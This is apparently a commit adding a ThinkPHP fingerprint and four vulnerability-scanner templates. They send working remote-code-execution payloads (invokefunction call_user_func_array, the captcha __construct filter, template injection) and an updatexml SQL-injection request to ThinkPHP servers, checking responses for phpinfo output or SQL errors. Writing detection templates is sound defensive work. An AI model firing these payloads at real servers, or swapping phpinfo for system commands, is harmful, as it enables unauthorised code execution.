Added ThinkPHP templates and signature.

patch-1
parrot 2021-01-19 01:16:59 -03:00
parent 4b13b7a485
commit 58ebf59035
5 changed files with 107 additions and 1 deletions

View File

@ -2747,3 +2747,10 @@ requests:
part: header
words:
- 'Server: monit'
- type: word
name: thinkphp
words:
- "ThinkPHP"
part: header

View File

@ -0,0 +1,24 @@
id: thinkphp-2-rce
info:
name: ThinkPHP 5.0.22 RCE
author: dr_set
severity: critical
description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
# reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: thinkphp-5022-rce
info:
name: ThinkPHP 5.0.22 RCE
author: dr_set
severity: critical
description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default).
# reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
requests:
- method: GET
path:
- "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: thinkphp-5023-rce
info:
name: ThinkPHP 5.0.23 RCE
author: dr_set
severity: critical
description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
# reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
requests:
- method: POST
path:
- "{{BaseURL}}/index.php?s=captcha"
headers:
Content-Type: application/x-www-form-urlencoded
body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: thinkphp-509-information-disclosure
info:
name: ThinkPHP 5.0.9 Information Disclosure
author: dr_set
severity: critical
description: Verbose SQL error message reveals sensitive information including database credentials.
# reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"
matchers-condition: and
matchers:
- type: word
words:
- "SQLSTATE"
- "XPATH syntax error"
condition: and
- type: status
status:
- 500